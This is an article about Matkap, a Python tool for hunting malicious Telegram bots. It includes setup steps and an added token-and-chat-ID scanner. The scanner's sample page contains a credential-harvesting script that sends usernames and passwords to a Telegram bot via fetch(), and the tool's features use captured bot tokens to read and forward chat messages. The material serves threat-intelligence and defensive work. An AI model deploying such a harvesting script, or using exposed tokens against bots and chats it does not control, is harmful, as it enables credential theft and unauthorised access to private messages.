Matkap: A Python Tool to Hunt Down Malicious Telegram Bots

Summary

Matkap is an open-source Python tool designed for cybersecurity professionals to analyze and identify malicious Telegram bots. It offers features like integration with FOFA and URLScan for token hunting, message forwarding, and log export. This tool is valuable for security research and understanding Telegram bot interactions.

Repository Info

Updated on October 12, 2025

Introduction

Matkap is a powerful open-source Python tool developed by 0x6rss, specifically designed to hunt down and analyze malicious Telegram bots. Intended for cybersecurity professionals and researchers, Matkap provides functionalities to investigate bot interactions, identify potential threats, and gather intelligence. It integrates with external services like FOFA and URLScan to broaden its scanning capabilities for exposed bot tokens and chat IDs. Please note, Matkap is for educational and research purposes only, and users must adhere to ethical guidelines and legal regulations.

Installation

To get Matkap up and running, follow these steps:

Prerequisites

  • Python 3.7+ installed on your system.
  • Pip for package management.
  • Telegram API credentials: Obtain api_id, api_hash, and phone_number from my.telegram.org/apps.
  • (Optional) FOFA Account and URLScan Account if you plan to use their scanning features. You will need FOFA_EMAIL, FOFA_KEY, and URLSCAN_API_KEY.

Setup

  1. Clone the repository:
    git clone https://github.com/0x6rss/matkap.git
  2. Navigate into the project folder:
    cd matkap
  3. Create a .env file:

    In the matkap directory, create a file named .env and populate it with your Telegram API credentials and optional FOFA/URLScan keys:

    TELEGRAM_API_ID=123456
    TELEGRAM_API_HASH=your_api_hash
    TELEGRAM_PHONE=+90000000000
    
    # (Optional) For FOFA & URLScan:
    FOFA_EMAIL=your_fofa_email
    FOFA_KEY=your_fofa_key
    URLSCAN_API_KEY=your_urlscan_api_key
  4. Install dependencies:
    pip install -r requirements.txt
  5. Run Matkap:
    python matkap.py

    Upon first run, Telegram will send a login code to your phone, which you'll need to enter in the terminal.

Examples

Matkap offers a user-friendly interface with several key functionalities:

  • Start Attack: Input a malicious bot token and chat ID to begin monitoring.
  • Forward All Messages: Iterate through and forward older messages from a specified chat, with options to stop or resume.
  • Hunt With FOFA: Search for exposed Telegram Bot Tokens and Chat IDs on websites indexed by FOFA, specifically looking for body="api.telegram.org". Results are logged in the Process Log.
  • Hunt With URLScan: Similar to FOFA, this feature uses URLScan to find exposed tokens and chat IDs referencing domain:api.telegram.org.
  • Export captured messages: All captured Telegram messages are automatically saved to the "captured_messages" directory for later analysis.
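What the two hunting features look for, shown as an added example (not Matkap's own code): a small scanner an analyst can run over saved page source to flag Telegram Bot API tokens, the API method being called, and chat IDs, reporting tokens only in redacted form. The function names, the token pattern (8 to 10 digit bot id, a colon, 35 URL-safe characters) and the sample page are assumptions constructed for illustration.

```python
import re

# Assumed token shape: 8-10 digit bot id, a colon, 35 URL-safe characters.
TOKEN_RE = re.compile(r"(?<!\d)(\d{8,10}):([A-Za-z0-9_-]{35})(?![A-Za-z0-9_-])")
# A Bot API call embedded in page source: api.telegram.org/bot<token>/<method>
API_RE = re.compile(r"api\.telegram\.org/bot(\d{8,10}:[A-Za-z0-9_-]{35})/(\w+)")
# chat_id assigned as a query parameter, JSON field or script variable.
CHAT_RE = re.compile(r"chat_id[\"'\s:=]{1,4}(-?\d{5,15})")


def redact(token):
    """Keep the bot id and the last four characters so reports never carry a usable token."""
    bot_id, secret = token.split(":", 1)
    return f"{bot_id}:{'*' * (len(secret) - 4)}{secret[-4:]}"


def scan(text):
    """Return redacted token findings (with line numbers and API methods) and chat IDs."""
    tokens = {}
    for m in TOKEN_RE.finditer(text):
        entry = tokens.setdefault(
            m.group(0), {"token": redact(m.group(0)), "lines": [], "methods": set()}
        )
        entry["lines"].append(text.count("\n", 0, m.start()) + 1)
    for m in API_RE.finditer(text):
        if m.group(1) in tokens:
            tokens[m.group(1)]["methods"].add(m.group(2))
    return {"tokens": list(tokens.values()),
            "chat_ids": sorted(set(CHAT_RE.findall(text)))}


# Constructed sample: a credential-harvesting page posting form data to a bot.
FAKE_TOKEN = "1234567890:" + "A" * 31 + "test"  # constructed, not a real token
SAMPLE = f"""<script>
var chat_id = "-1001234567890";
fetch("https://api.telegram.org/bot{FAKE_TOKEN}/sendMessage?chat_id=" + chat_id
      + "&text=" + encodeURIComponent(user.value + ":" + pass.value));
</script>
<p>Order 20250101:ref is not a token</p>"""

if __name__ == "__main__":
    print(scan(SAMPLE))
```

The same scan works on your own repositories and deployed pages to catch a bot token that was committed or shipped to the client by mistake.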

Why Use Matkap?

Matkap is an invaluable asset for:

  • Cyber Threat Intelligence (CTI): Gaining insights into the operational methods of malicious Telegram bots.
  • OSINT Investigations: Discovering exposed bot tokens and chat IDs that could lead to further intelligence.
  • Security Research: Analyzing bot behavior, message forwarding patterns, and potential data exfiltration.
  • Educational Purposes: Understanding the security landscape of messaging platforms and developing defensive strategies.
